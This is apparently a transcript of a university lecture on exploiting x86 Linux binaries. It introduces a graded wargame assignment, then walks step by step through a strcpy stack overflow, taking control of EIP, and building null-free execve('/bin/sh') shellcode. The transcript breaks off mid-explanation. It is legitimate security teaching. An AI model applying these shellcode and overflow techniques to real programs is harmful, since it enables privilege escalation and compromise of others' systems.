All right, folks, let's get started. So: good news, good news, and even better news. Good news, spring break is next week. Even better news, you get a new assignment. It's the funnest one you'll do in this class, so it's going to be great. I want to briefly go over it. It's on the website right now. You can't access anything yet, so calm down, relax; there's nothing you can do at this point. That will happen after this class. It's split into two parts, basically because I want to force you to get started on this and not wait until the end, because this is a very difficult assignment. No, no, no, there's plenty of time. The first five levels are easy. Well, easier. We'll get into that in a second. Basically, part one is due 3/13 and part two is due 3/22. And you're going to be applying everything that we've learned about attacks on x86 binaries in Linux environments. You're going to use all your skills and knowledge to break these binaries. The idea is you'll each get an email with your username and password. You don't have that yet, so you cannot log on to the system. I have mine, so I can log on. So, let's see. If I run id, I can see my user name is adamd and my group is adamd, but I'm also in the group level1. And if I look at the handy-dandy /var/challenge directory, we can see that there are a number of challenges. There are actually 15 different challenges here. You can think of this as a ladder: you have to break the first challenge to get to the second challenge. This is why it's imperative that you start on this early and break the first five. Otherwise, you're staring at breaking 10 difficult binaries in a span of three days. There are 15 up there? Yes. The ones after 10 are extra credit.
Let me log on, one second. So we've actually studied Linux permissions. Which one of these directories will I actually be able to look at as my user? Yeah, level1. All these directories are owned by a challenge user, which none of you will be able to become. The group on the first directory is level1. I'm in the level1 group, and the level1 group can read and execute the level1 directory. So I can do ls -la /var/challenge/level1 and it will list that directory. I can't even look at level2 until I break level 1. When we look at level1, we can see that inside there's a binary called 1. The owner is challenge, the group is level2, and the s on the group execute bit means the group can execute it and it's set group ID, so when you execute it, it runs with group level2. And you can see a couple of you already ran it; they were testing out the system. You can also run the score command. I've provided a score command, which is the scoreboard, and it knows when you've broken a level. When you break level 1, you then have to become, or join, the level2 group. It's not super crazy difficult, but it's not straightforward. So to help you out, I've provided a command called leet. Your goal (and you can do which leet) is to get the /var/challenge/level1 binary to execute the leet command for you, which will then make you level 2. If you do that, you'll be at level 2, and then you can see the level 2 challenge, and from there you get to level 3, and so on and so forth. What happens if you execute the binary? I don't know, you go figure it out when you're on there. That's literally the challenge, yeah. That's why it's leet. I hope not. We'll talk about that in a second. Cool.
So yeah, all of you will have a user account on this system. You each have your own individual account; you can see there's a bunch of users on here. That's all of you, and everyone's obfuscated: you're a hash, so now you guys are real, true hackers. Okay. So tools: there's a list of tools, but you've already done some CTF-like stuff, so you're familiar with these, which is awesome. Each level is worth 10 points for levels 1 through 10. So level 1 is 10 points, and so on and so forth. Scoring is very simple. Levels above 10 are extra credit. We may add new nefarious challenges at the end there, extending the ladder. They're worth, I don't know, some amount of extra credit. It's not really about the extra credit; it's about being an awesome hacker and seeing yourself at the top of the scoreboard. Levels 1 through 5 are just a forcing function, to be honest. So just solve them. You don't have to submit anything. Solve levels 1 through 5 before the part one deadline for 100%; after that they're worth 25%. So don't do that, but you can still get points. You'll probably write code for this, so keep track of all the code you write. Create a README as you go: as soon as you break a level, go over to a text file called README and write down how you broke that level. So we have an account that we actually... Yes, you will have an account on the system. I will give you SSH access. So do we have home directory permissions and unlimited space? No. We are limited in capacity. I've actually added a bunch of mechanisms, because over the years people have crashed it. Each of you can have 50 running processes at once; beyond that you can't spawn any more processes. That does come up, so be careful about that. I mean, it shouldn't, but I've seen it happen.
Because I've had people fork bomb my server before, which is not good for anyone. And so basically you're not going to purge our home directories? Correct, no. It's running on Amazon EC2. It has 4 cores and 16 gigs of memory. I think I used that last time and it was fine, so I don't think we'll have any capacity problems. But if we do, that's the great thing about the cloud: I just get more. But make sure you're keeping track of how you do this. It's really important: if there are any academic integrity problems, which there have been in the past, this makes it very clear that you did it. Not just, yeah, I broke level 1. What your README is, is documentation that you actually did this, right? Questions? High-level questions. This is an individual assignment, so you have to work on it on your own. Do you get extra credit for coming in first? Yes. Not just first, though; there'll be extra credit for, let's say, the top three overall. Is the process the same for each level, where you have to get the binary to execute leet? Yes. Essentially you have to get control of the control flow and somehow get it to execute the leet command, either by injecting code or by using any of the attacks we've talked about. But yes, that definitely is the goal. Or maybe, and I actually don't remember, so maybe I shouldn't talk about it, because I'm afraid of accidentally leaking information, but maybe it will call leet for you if you get certain conditions correct, something like that. So would time be a tiebreaker? Yes, the scoreboard is sorted based on the time you solved each level. Good question. So you'll be able to see exactly where you stand. How many assignments are left? This one and one other one, I think. Probably not more, but we'll see. It'll basically be this type of challenge, a similar style, but with a web application. Which will be fun.
I suppose as a part of that question, the midterm is... Yes, I'm going to decide today. I was setting this up. All right, cool. You'll have fun. Okay, now we're going to cover material so you know what to do. Some of the levels may involve things that we only cover afterwards; that's just the way it is. Use all resources. Essentially every resource is available to you except each other. You can look things up, but don't go posting on Stack Overflow something like, here's a binary that looks like this, how would I exploit it to get a shell? That's obviously not okay. Anyway, I think it's pretty clear you all understand what's going on. Cool.

So we talked about function calls. What does the caller do? It pushes the arguments onto the stack in right-to-left order, then pushes the address of the instruction after the call. The callee pushes the previous frame pointer onto the stack and creates space on the stack for local variables. On the way out it ensures that the stack is consistent and that the return value is in EAX. Awesome. Exactly, so the idea is that the saved base pointer and the return address are stored on the stack. This goes back to the terrible analogy I tried to make on Monday about the trail of breadcrumbs. So let's look at one example of what can happen if we end up overflowing those values. We have a quick function, mycopy, which returns void and takes in a character pointer, str. It has a local buffer foo of size 4 and does a strcpy of str into foo. So what are the semantics? What's actually going to happen in that function call? strcpy is destination comma source, so it's going to copy from str to foo. How much is it going to copy? Four characters? Until what? Until the null terminator. So it's actually an unbounded copy. However many characters are in the string str, that's how many get copied into foo. This is one of the key problems here: strcpy doesn't take a limit on how many characters to copy. So fundamentally, this is one of those functions, and we'll talk about some others later.
As soon as you see it, you know that if you can control the str variable, this is a vulnerability. So we have our main. Main is going to call mycopy with a constant string. I have stolen this from my 340 class; this is why you should never put class numbers into your slides, FYI. Then we'll print "After" and return 0. When we compile this, we see main, and this is a very simple program. We have our prologue just like before: push EBP, move the stack pointer into the base pointer, subtract 0x10 from the stack pointer, move some fixed hex address, 0x8048504, onto the stack at ESP, and then call mycopy. So what is that fixed value? It's the address of the constant string, "asu cse 340 fall 2013 rocks". The compiler puts that into, probably, the read-only data segment. I can't remember exactly which one it is, but probably .rodata. Then the ELF header says that the data is loaded at this fixed location, and that's why the compiler can put the fixed memory address in here. And we can see it's moving it directly onto the stack, so it has put the argument to mycopy on the stack. It's then going to move 0x8048517 into EAX. Yes? So that's the actual string? Yes, it's the address, so at that memory location should be the bytes a, s, u, space. Okay, so this is another one of those weird compiler things: move 0x8048517 into EAX and then move EAX onto the stack. I don't know why. Then call printf, so this is the call that prints "After"; this must be the string at 0x8048517, and I bet if you took the delta between those two fixed values, it would be the length of the first string plus a null byte, because my guess is it puts the next string right after it. Then move 0 into EAX, then leave and return. In mycopy we have push EBP, move the stack pointer into the base pointer, subtract 0x28 from the stack pointer, then move EBP plus 8 into EAX. So what's EBP plus 8? The string str, yeah, the argument, right?
It's a positive offset from EBP, so it's going to be an argument. Then move EAX into ESP plus 4. Then load effective address EBP minus 0xC into EAX. So what's the value that's going to be inside EAX? The address of the local variable, exactly. It's the same thing as if you asked, what's the address of foo? The address of foo is EBP minus 0xC. Then move EAX onto the stack at ESP. So now what do we have on the stack, reading right to left? A character pointer, the pointer to str, and then a pointer to foo. Then we call strcpy, and then we leave and return, because that's all the function does, right? Very simple function. So let's walk through this and just see what happens. We have our nice registers again, EAX, ESP, EBP, EIP, and we have all of our instructions at these fixed locations. We have our stack, higher to lower addresses. Let's say the stack pointer starts off at FD2D4, and the base pointer is something else; it should be above it, that's a typo on the slide. We start off executing in main, so let's step through this a little bit quickly. We push EBP, we move the stack pointer into the base pointer, we subtract 0x10 from the stack pointer, we then move 0x8048504 onto the stack, and then we call mycopy. So when we call mycopy, what's going to happen? How is this diagram going to change? Awesome, so the call to mycopy will change the instruction pointer to 0x80483F4, it's going to move the stack pointer down 4 bytes, and it's going to copy 0x8048423, the address of the instruction after the call, onto the stack there. Then mycopy starts executing. It has to save the base pointer, so it pushes EBP, moves the stack pointer into the base pointer, and then subtracts 0x28 from the stack pointer, which is a lot, so we have to change the diagram. Then it's going to move EBP plus 8 into EAX. So what value is going to be inside EAX?
Is it going to be FD2C0? Is that EBP plus 8? What's the difference between these two instructions, the move of EBP plus 8 into EAX and the load effective address of EBP minus 0xC into EAX? At this level there's no such thing as arguments and local variables, yeah. So the first one, the move, is a dereference: take whatever is at EBP plus 8, dereference that, take those 4 bytes, and move them into EAX. So the value inside EAX after this step should be 0x8048504, not the address FD2C0. That's the key difference between a move and a load effective address. Then we're going to move that to ESP plus 4. Again, similar concept: we're moving a register into a dereference, so the value gets stored in memory at ESP plus 4. It can't mean changing the address itself, because you can't change a memory address, that doesn't make sense, so that's another way to check your reading. EBP minus 0xC is FD2AC, so we move that into EAX, then we move that onto the stack at the stack pointer, and then we call strcpy.

We're not going to step through strcpy. We know its semantics from the man page (you'd need to look at how it's actually implemented), but we know it's going to dereference 0x8048504, take that byte, copy it to FD2AC, increment a counter i, and check: is whatever is at 0x8048504 plus i null? If it's not, copy it to the next location. So it's just going to copy, copy, copy as it walks through these pointers. And we know that at memory location 0x8048504 are the bytes a, s, u, space, c, s, e, space, 3, 4, 0, space, and so on, so it's going to start writing those bytes onto the stack starting at FD2AC. I'd actually write it out byte by byte, but that's kind of annoying, because the diagram shows four bytes at a time, so we're looking at things in terms of integers. That's where endianness comes in: the byte pattern will look backwards because of the endianness. This is what I said where it gets a little bit tricky. But if you looked, what's at address FD2AC is 0x61, which is lowercase a, what's at FD2AD is 0x73, and so on and so forth.

And it's going to keep doing that, because it doesn't know that this buffer foo in the C program is only supposed to be four bytes. The CPU doesn't care about buffers or arrays or anything; all it cares about is moving bytes between memory and registers. There's no check anywhere, so it's going to keep going and keep writing. It's going to overwrite the saved EBP on the stack, it's going to overwrite the saved instruction pointer on the stack, it's going to overwrite even the argument to the function at EBP plus 8, and it keeps going until it hits the null byte, and then it returns.

So does it crash in strcpy? Did it ever write to invalid memory? Is the stack writable? Yeah, it has to be, right, because that's the entire purpose of the stack. Did strcpy write anywhere that's not the stack? Did it write to unallocated memory? Did it write to read-only memory? No. So it doesn't fault; it just goes boom, boom, boom, boom, changing bytes, and then it returns back to us. Because where on this diagram is strcpy's function frame? Could strcpy overwrite and mess up its own frame? Its frame is lower down on the stack. The stack grows down, so when we call strcpy, we know that right underneath FD290 will be 0x804840C, the address after the call to strcpy, and then there will be a saved base pointer underneath that. The reason this didn't cause a problem is that when we write to a buffer, we almost always write toward increasing addresses. You can think of it as: we write up and the stack grows down. So we can corrupt things in the function frames above us, but it's harder to corrupt the frames below, unless for some reason the code is iterating through the buffer the other way, from the last element to the first. Think about that: the write would have to go in the reverse direction to corrupt the frame of a function called after you.

Okay, so then it returns, right? Does mycopy crash at this point? I don't know, that's what we're working out. It just returned from strcpy, so the instruction pointer is at 0x804840C, which is the leave instruction. Will the leave instruction execute? Yeah, right, there's nothing stopping it. It got to this point because of the return from strcpy. Then we do a leave, which is going to do what? Set the stack pointer to the current base pointer, and then what? Pop EBP. So the base pointer and the stack pointer are going to point to the same address, and then we do a pop EBP, which means the value inside EBP will be 0x6C6C6166, which is "fall" backwards in ASCII, and the stack pointer moves up. Is it going to crash at this point? Does it dereference that value or try to access anything off of EBP? No, it's just copying a value from memory on the stack into a register. It doesn't matter what that value is; if you copy null from the stack into a register, it's not going to crash. And then we get to return. So what's return going to do? Pop what's on top of the stack into EIP and try to execute from there. So which hex value is it going to try executing at? If you can see it, or maybe you can't, maybe somebody else can: 0x31303220. So that would be space, 2, 0, 1, backwards, in hex. And then it's going to try executing from there. So assuming that memory region is not mapped into our program's memory, what's it going to do? Segfault, right?
It should throw a segfault and crash the whole program, because EIP will be 0x31303220, and then it will try to fetch an instruction from there, but it can't access that memory, so it fails. And that's what we get. So I ran this program. You can do this yourself; you can copy this C code, and I highly encourage you to do that. You can see that even with -Wall, so showing all warnings, it doesn't give any warnings or anything. We run it and we get a segfault. If we run it in GDB and say run, it'll run and report a segfault at 0x31303220, because it's trying to access that memory. And if we do info registers in GDB, which shows us all the registers, we can see that EIP is 0x31303220 and EBP is 0x6C6C6166. So this is already good, because it means we can take down this program. Let's say that string was our input into the program and not part of the code: by supplying that input we can get the program to crash. But that's not cool enough. That doesn't give us access and permissions that we don't normally have. So what we're going to look at is how to do this in a way that, A, doesn't crash the program and, B, executes arbitrary instructions that we choose.

So these are some of the overflow-prone functions. Yes? If you keep writing upward, all the way past FFFF, would you wrap around to 0? On most, actually I would say nowadays on every single system, writing to 0 is going to be a segfault, because 0 is null on almost all systems, so they make sure that nothing is mapped there. Otherwise a null pointer dereference could actually give you a value in your program instead of a crash. Say again? Oh yes, in mycopy it subtracted 0x28. I don't know how the compiler decided that. Even though it's only a 4-byte buffer, it's allocating all of that space. This is one of the reasons why it's so important to look at the binary, at the assembly itself. Because if you look at the C code, you'd say, oh, there's a 4-byte buffer here, so there must be 4 bytes from my buffer to the saved base pointer and then 4 bytes beyond that to the saved EIP. But the real layout is right here, staring you in the face. You know the buffer is at EBP minus 0xC. That means even though they subtracted 0x28 from the stack pointer, there are only 0xC bytes from your buffer up to EBP, then EBP points to the saved EBP, which is another 4, and then you're at the saved instruction pointer. So you can just map it out and not guess, which is awesome.

All right, so these are the functions: essentially any function in the C library that copies memory without letting the programmer specify the maximum size the destination can accept. gets is one, and it's a key one. gets reads from standard input, so it only takes one parameter, which is the buffer, and it reads from standard input and puts that into the buffer. This is, like, the worst possible function we could ever imagine making, because literally any usage of gets is 100% vulnerable. It's reading from standard input, which is you, the user, which is attacker controlled, and it's fundamentally an unbounded read. There's no possible defense: even if you have a buffer that's 10,000 bytes, I can always give it more than 10,000, and even if it's a gigabyte, I can pass in a gigabyte plus however much I need. So this is inherently broken. The other ones are maybe less bad, just in the sense that when you're reading from a specific file, the program could open a file that it controls and technically know the size. But all of these, where you can't specify the exact size to read, are bad in that they can be vulnerable; gets is virtually 100% vulnerable. The important thing is that each of these functions operates differently. So are these functions provided by the operating system? Are these system calls?
No. libc, yes; they're in the C standard library. Each of these functions has different semantics for what it considers the end of the input. gets will keep copying characters until it gets to a newline or end of file. This is something you need to keep in mind. Let's say you're trying to send input to the program on standard input and you're trying to create, as we'll see, some kind of exploit payload. If you include a newline, it won't read all of your payload, so you have to make sure your payload doesn't include any of these characters. Newline is one; end of file is not a character, it literally just means the end of the input, you've reached the end of the file. Then strcpy and strcat: these are other functions where, if the attacker controls the source parameter, there's no possible way a developer can ever specify a fixed size in advance; there's no way to create a buffer big enough in advance. So what's going to be a character that you can't use in your exploit for a strcpy?
Null, because that's going to be considered the end of the string. But newlines are fine. So these are differences you need to think about. As we'll maybe get into, there's a whole category of shellcoding challenges, which I walked you through the most basic of at the last CTF, where they do crazy things, like your shellcode has to be ASCII, so your payload has to be just ASCII characters. Or, oh man, what was the... yeah, there was one CTF where you gave it an image, and it would take pixels from there, calculate an error correcting code, and that would end up being your shellcode. It was insane. All kinds of crazy stuff.

So the scanf family of functions: these can also be vulnerable with a %s, which reads into a character string. These library functions are the clear cases, because they have well-defined semantics, but you can easily write code yourself that keeps reading. Even with getc, which gets one character, if the code keeps reading in an unbounded loop, that can also be a vulnerability. So you need to understand these functions, but also realize that what matters is whatever the code does, and the code includes all the functions that it's calling as well.

All right, so how do we actually exploit this? What's going to be our goal? We've already hinted at it many, many times. Step one, overflow the buffer. Step two, figure out how we... yes? Okay. So essentially, with what we've seen, we control the EIP register. If we have an arbitrary write onto the stack, a buffer overflow, we know we can overflow that buffer and overwrite the saved EIP on the stack. We can also overwrite the saved EBP on the stack, which is actually important for more advanced techniques, but we can ignore that for now, because what we really want to control, eventually, is the instruction pointer. If we can't control the instruction pointer, then we may have to try other things. So we want to control the instruction pointer, and we saw here that we can give it a garbage value that doesn't exist in the process's memory space, and it will crash. But what if we gave it, let's say, a random address that was actually in the process's memory space, that was allocated to the process? Possibly; that's one option. But we know the CPU is just going to fetch and decode, the whole pipeline, whatever instruction is at that address, and if we just pick randomly, there may or may not be valid x86 code there.

So this is where we get in a time machine and go backwards. We looked at all the ELF section headers. It used to be that the stack was marked executable, so it was writable, readable, and executable. And actually some programs legitimately do this even today. You've heard about JITs, just-in-time compilers, that compile Java to native code on the fly: they literally create executable code on the stack or on the heap or wherever, and that's the code that runs. So this is still a thing that happens. If the heap is executable, do you think it's possible to load an instruction and have almost like a callback function that you can execute before doing that? I don't think I said that; I said the stack is executable and we can control EIP by overwriting the saved EIP on the stack. So what do you want to write into that saved EIP on the stack, which will then become the EIP register, which is where the CPU will fetch and execute? What would you like to put in there? The address of something that we wrote. And we can actually write x86 code, as long as it doesn't have, if we're using gets, any newlines, or, if we're using strcpy, any nulls. If we put those byte values onto the stack and then change the instruction pointer to point to the start of those instructions, the CPU doesn't care that they're on the stack, as long as it can execute that memory region. It will fetch and decode that instruction and keep executing.

That is our goal at this point. Our goal is to get control of the execution of this program, and what we're talking about now is controlling EIP and making it jump to code that we inject into the application. This is still a fantastic paper that I go back to every so often to refresh myself, so I highly recommend you look at it: "Smashing the Stack for Fun and Profit". I wish I knew what year it came out. It's from Phrack magazine; Phrack is still around, and the name comes from the phone phreaking days that we talked about way back at the start of this class in January. The code that we're going to inject is called shellcode, because the idea is we want it to give us a shell, like /bin/sh, so we can then execute arbitrary commands. But the name shellcode doesn't necessarily mean it gives you a shell. You can have shellcode that does all different types of things, like reading out a file and sending it back to you. You're literally injecting custom x86 code, so you can do anything the program could do, or even things it maybe didn't think it could do. You can have what they call reverse connect shellcode, where the shellcode connects back to you on a certain port and waits for commands. You can have shellcode that listens on a port on that server and waits for you to connect to it. You can fork bomb stuff, I don't know, literally anything your mind can come up with. The whole idea is that this is code that we inject. As an attacker, if we write that code ourselves and just run it, what permissions does it run as? Us, yes, our user, right. But if we exploit a setuid program, inject code into its process, and get it to execute that code, what permissions does that have? Yes, whatever permissions the setuid user has. Perfect.

So what we want to call, essentially, I mean the basics, is execve of /bin/sh, and it depends on how nice we want to be. So let's look at execve. This is the system call we want to call. The parameters we want to pass in are the file we want to execute, /bin/sh, which I believe is in the POSIX standard, so it's on every single Unix system. Then the argv vector. If we want to be like a normal program, what will we pass as the argv vector? What is the argv vector? The arguments to the program. So what program do we want to execute? /bin/sh. Do we want to pass in any arguments, is the first question? No, we just want to run a shell. Like in this shell, if I want to run /bin/sh, I type /bin/sh and now I'm running a shell, and it's doing stuff for me. But when I run /bin/sh like this, I'm already running, probably, bash, which, as we went through, is going to call execve with /bin/sh. For the argv parameter, how many elements is it passing in? One. What is that one element? The name of the program, yes; argv[0] is the name of the program, exactly. And this actually bit me in a CTF, which is why I make a point of this. You can write shellcode that does execve of /bin/sh with no argv, but the problem is with some versions of /bin/sh. Specifically, there's this system called BusyBox, which is what the CTFs use, and if its /bin/sh is executed without the argv[0] parameter, it won't know what to do and it won't work. That caused me, like, hours of frustration. I think you were there for that; that was super annoying. So I ended up writing shellcode to pass /bin/sh in an array as the second argument to execve. For the environment we really don't care, because once we get code execution of /bin/sh, we're good. So our goal, if we were to write this in C: we'd have an array of character pointers called name, so really a character pointer pointer. name[0] is going to be /bin/sh and name[1] is going to be null. So why is name[1] going to be null?
Yes, because that's the semantics of execve. execve says the second parameter is a character pointer pointer, and how it knows it's at the end is that the last element of that character pointer array will be NULL. And then we call execve with name[0], so we pass in /bin/sh there, and then name, and then NULL. And then if we're really nice we'll exit afterwards. This should never actually happen, because execve doesn't return unless there's an error, but I like to write nice code.

Okay. So this execve system call goes back to the calling semantics. How does a program invoke a system call? int 0x80, yeah, like in the last one. And it has to set up the values in specific registers before that actually happens. You have to look this up, because there's a table that maps values in the eax register to system calls. So a value of 11, hex 0xb, in eax means execve.

So the goal of our shellcode, kind of looking backwards: the very last thing we want is int 0x80, because that's going to be the system call. At that point in our assembly code we need the hex value 0xb to be inside the eax register, otherwise nothing's going to work. We need the address of the program name in ebx. So does this mean we need the string byte values of /bin/sh in ebx? No, it has to be the address. The string is longer than four bytes, so it doesn't fit, and it doesn't make sense anyway. The important thing is looking at the function specification: the file name parameter is a character pointer, which means it must be an address, and the bytes at that address need to be /bin/sh followed by a null byte.

Then we need a double character pointer as the second argument. So in ecx we need a pointer, and where that pointer points to needs to be a pointer to the string /bin/sh, and then four bytes past that needs to be NULL, because otherwise those will be the arguments
that are passed as argv. And then we just need NULL in edx, which is super easy to do, and then call int 0x80.

We inject this shellcode in some way into the application. So let's say we'll change the previous example: instead of a string copy of a constant string, it'll be a string from argv[1] or something from the user, and so we'll be able to control the bytes that are overwritten on the stack.

And the exit is just to show you that you can do different kinds of system calls. exit takes in the status, so we need the value 1 in eax, because that's the index of exit in the system call table, and the exit code in ebx, and then call int 0x80. This code is much easier to write: just move 1 into eax, move 0 into ebx, and then int 0x80.

So how do we actually do this? Think about sitting down to write this code. You can think of this like a checklist: you have to have all of these conditions be true by the time you're done. 0xb into eax: how would you do that in x86 assembly? That's the only thing that the computer, the CPU, understands. So mov $0xb, %eax, source then destination, just a move immediate of 0xb into eax. That one's super easy. So this is nice: we can control any single value inside eax or any register, we can change that at will.

These next ones are trickier but not impossible. The problem is we need a null-terminated string /bin/sh somewhere in memory, in the program's memory space. And we need not only the string /bin/sh, we also need a pointer to that memory address... wait, what am I talking about... okay, I need to draw a picture. At some memory location we need /bin/sh; let's call it foo for now. Some memory location in the program, and it needs to be readable by the process. And then we're basically going to say move, in some sense, the address of foo
into %ebx. Of course this is not one of the standard instructions; we need to figure out some way to do this. And then we need somewhere in memory, let's say at bar, those bytes to be essentially the address of foo and then NULL. And then we need some kind of move of the address of bar into ecx.

So what do we know that the program has that is writable, that we can possibly store values in? We could use the data segment, there's a .data segment in every process, but it starts at different memory locations. When we did our overflow, did we corrupt or change the stack pointer? No, the stack pointer was at the same location. So we can actually cheat and use the stack. So these are the steps; we basically already have this.

Okay, so we're going to cheat first: we'll just write the code to show that this actually works. If we were writing this as an assembly program, we would declare the string /bin/sh with .string, and then we'd have our text segment, .globl main, which is just for compilation purposes, and a main function. Move 0xb, or 11, into eax. Move $sh into ebx, so this is going to move the address of that string /bin/sh into ebx. Then push 0, so here is where we're going to use the stack: we push 0 onto the stack, and then we push the address of /bin/sh onto the stack. Right now the stack pointer points to the start of an array whose first element points to the string /bin/sh and whose next element is 0. So we move the stack pointer into ecx, move 0 into edx, and call int 0x80. Then, because we're good, we move 1 into eax, 0 into ebx, and call int 0x80; this is just the exit system call. And then we're done.

So you can compile this, you can run this, you can even compile this with gcc and it'll do everything. Call it the preliminary shellcode, a .s file. You can run it and it's going to give you a shell, because it's going to call execve
of /bin/sh with an argv of /bin/sh. And we can look at the disassembly, and you can see the assembly is almost identical to what we wrote.

So if I took this and copied it onto the buffer of the program that we just saw, and you have to copy it exactly, top to bottom, so b8 0b 00 00 00, bb 1c 96, blah, blah, blah, and I changed the eip to point to the start of this, what's going to happen? It's going to start executing. Am I going to get a shell? Why not? You've still got a feeling of no? It's too early? Because I called it the preliminary shellcode. We're not actually passing any argument to the shell? No, we are, because we use the stack pointer, so inside ecx will be a pointer into the stack, and that will point to /bin/sh. The null bytes? No, not the null bytes, I don't care about null bytes at this point. Let's say we get all of them in there, with not a string copy but an fgets or something.

Are you asking about porting this assembly onto another machine, or are you asking about putting this code right here? I said, if I take this code right here, copy it byte for byte onto the stack, change the saved eip to point right to this very first instruction, and start executing it, what's going to happen? Permission issues, it wouldn't be a regular user? Let's say I've fixed all of those issues. We'll talk specifically about that, but I've done that all correctly. Is the address 804961c available? Where is 804961c in this? According to this shellcode, what is there? It's a pointer. What is at that memory location?
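To make the address question concrete, the first two instructions can be decoded by hand. This Python sketch assumes the bytes read out above are b8 0b 00 00 00 followed by bb 1c 96 04 08; the last two bytes are inferred from the address 804961c mentioned in the lecture, so treat them as an assumption. decode_mov_imm32 is a hypothetical helper for this example, not a real disassembler.

```python
import struct

# Assumed first two instructions of the preliminary shellcode.
#   b8 imm32 -> mov $imm32, %eax
#   bb imm32 -> mov $imm32, %ebx
PRELIM = bytes.fromhex("b80b000000" "bb1c960408")

REGISTER_FOR_OPCODE = {0xB8: "eax", 0xBB: "ebx"}


def decode_mov_imm32(code, offset):
    """Decode one 5-byte 'mov $imm32, %reg' instruction at the given offset."""
    register = REGISTER_FOR_OPCODE[code[offset]]
    (immediate,) = struct.unpack_from("<I", code, offset + 1)  # little-endian
    return register, immediate


for off in (0, 5):
    reg, imm = decode_mov_imm32(PRELIM, off)
    print(f"mov $0x{imm:x}, %{reg}")

# The absolute address is baked into the bytes themselves, so it travels
# with the shellcode into whatever process the bytes are copied into.
print("null bytes:", PRELIM.count(0))
```

The second instruction carries a fixed address from the program it was assembled in, and the first carries three zero bytes; both become problems later in the lecture.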
The /bin/sh. /bin/sh, exactly. But when we take this code and throw it into another process, what's at memory location 804961c? We have absolutely no idea. It's literally anyone's guess. There could be something there, there could be nothing there. It's highly unlikely that there is the string /bin/sh, which is the string that we desperately want. And without that the execve is going to fail, because the kernel won't be able to read that memory in the process, or it will read it and it will be something super weird.

So you should always test your shellcode, or any other things that you write. You can easily do this in many different ways, and I'll reference some tools in a bit. You can copy those bytes into a C string, this is the shellcode, and then I can create, here we go, a declaration of a variable called shell, which is a function pointer. This is how you can do super cool stuff in C, passing pointers to functions and all kinds of craziness. And we can just say shell is equal to shellcode, and we can call the function shell, because it thinks it's a function, it's a function pointer, and then see what happens. So if we do this, and we'll have to pass -z execstack, which makes sure that this process has an executable stack, just like we said used to be the case for all software, and we run it, we see we don't get our beautiful shell. And the problem is exactly the one that we just identified: the string /bin/sh is not in that program.

And this is the super cool thing about shellcode: because you're injecting x86 code into another process, it can't rely on any fixed memory locations. So what do we do? What are some ideas or techniques that we can try? You can just put the string on the stack itself and then point to that location? Yeah, so it's good, I cheated with my talk about the stack too early, but that's fine. Yeah, so there's a couple of ways, actually. So,
fundamentally, think about it theory-wise: your shellcode must contain the string. It could be encrypted or ROT13, but if you're injecting something into a process, are you expecting that the string /bin/sh is already there somewhere in memory?

There's a really cool technique you used to be able to do with call. When you do a call instruction, it pushes onto the stack the address of the next instruction to be executed. So the very first thing your shellcode would do would be to call to the end of your shellcode, because calls are relative offsets. So you call to the end of the shellcode, which puts onto the stack a pointer into your shellcode, and then you jump, maybe it was backwards, and then you jump back to the next byte. So you get the pointer onto the stack.

But a much better way is to push values onto the stack, which is way easier. So what we're going to do is push the string /bin/sh onto the stack, and we can do this with fixed values. We can push zero, and we have to do it in the correct order so that these pushes end up correctly. That is kind of annoying, which is why I have these comments that this is pushing bin; you have to read it right to left. So it's pushing /bin, /sh and zero. And now, after these two instructions execute, what is esp pointing to? The stack pointer points to /bin/sh, which is exactly what we want. So now, we know that inside the ebx register must be a pointer to the string /bin/sh, which means we can move the stack pointer into ebx, and then inside ebx we have a pointer to /bin/sh.

Why do we want to push the zero, like four bytes of zero, before this? So we can reuse it for the second part? We can do anything as long as it's semantically correct, but that's a good thing to think about. But now we do need to set up our array. So we do it like before: push zero, push ebx, because ebx is the pointer to the string /bin/sh, which means now the stack pointer contains a pointer to an array whose first element points to the string
/bin/sh, and the second element of that array is zero. So now we can just move the stack pointer into ecx, and then move zero into edx, because we want zero for the environment pointer, and then call int 0x80. So now we have our execve: filename, argv, environment pointer. And then we'll have our same exit at the end. We also want to test this shellcode to make sure it works. So objdump it, take these bytes, copy them into our shellcode tester, and then we'll get our shell. So that actually works, as long as we can get it to start executing at that very first byte, that 0x68.

Now we have a problem that was brought up earlier. The problem is we have nulls in the shellcode. So if our input is being string copied, well, it's going to copy b8 0b and then nothing. That's the only thing that's going to be copied over. So we need to rewrite our shellcode so that it has no zeros, sorry, no null bytes. And we probably want to eliminate newlines as well. I don't think there's any 0x0a in here, but for a similar thing with gets you want to make sure there are no newlines.

So how should we do that? I guess the first question is, where are those null bytes coming from? There's a couple of bad ones, so I'm going to cherry-pick. Like moving zero into edx, that one: what are other ways we can do that? XOR. XOR it with itself and we know it will be zero. Spoiler alert, that encoding doesn't have zeros, which would be the second thing to check. So we can change all of those to that.

What about this move of 0xb into eax? Why are there zero bytes in that instruction? Is it because of the move? Because it's moving four bytes. But what do we only care about in eax? The lowest byte, the al register. So if we move 0xb into al, that would change the least significant byte in eax to 0xb. But is that going to work in every single case? Let's think about this. Before we start executing, what's inside eax? Zero? We can't trust anything, we
don't know the value inside any register. So there could be all Fs inside eax. If there's all Fs inside eax and then I move 0xb into al, that's going to be 0xffffff0b, which is not 0xb, which is not what we want. So we should zero out eax using the trick that we just talked about: XOR eax with itself, and then move 0xb into al. And I think that'll get rid of most of these.

What about this zero? Why does this zero exist in the second instruction? Which byte was that? Byte three, so the upper byte. Because what are we trying to put onto the stack? Four bytes. Which four bytes? Zero, one, two, three? Yes, but no, kind of, I see where your logic is. What are we pushing onto the stack? /bin, then /sh and a zero. So we can actually use the trick I mentioned: XOR eax with itself, so we know eax has zero, and we can push eax onto the stack, so now there are four full zero bytes.

And then, there's a hundred different ways you can do this, but the main way is to use a trick with paths. Because the problem is, you're trying to push /bin, that's four bytes, and you have to do it in reverse order, so I like to think of it the other way: your last one is push /bin, the first one is /sh, and that's only three characters. I don't think you can push an immediate value that's three bytes onto the stack, so you need to push four bytes. So what you can use is the fact that you can have extra slashes in path names. So you can exec /bin//sh and that's exactly the same thing. So we can do that to make it exactly eight bytes wide, which should get rid of all of the null bytes, I think.

So this is pushing n/sh, so it's putting the extra slash at the beginning, which is kind of confusing. Okay, so we XOR eax, and now we know eax is zero. We're going to push eax onto the stack, so now we know there are four bytes on the stack that are zero. We're going to push n/sh and then push //bi, so we're actually
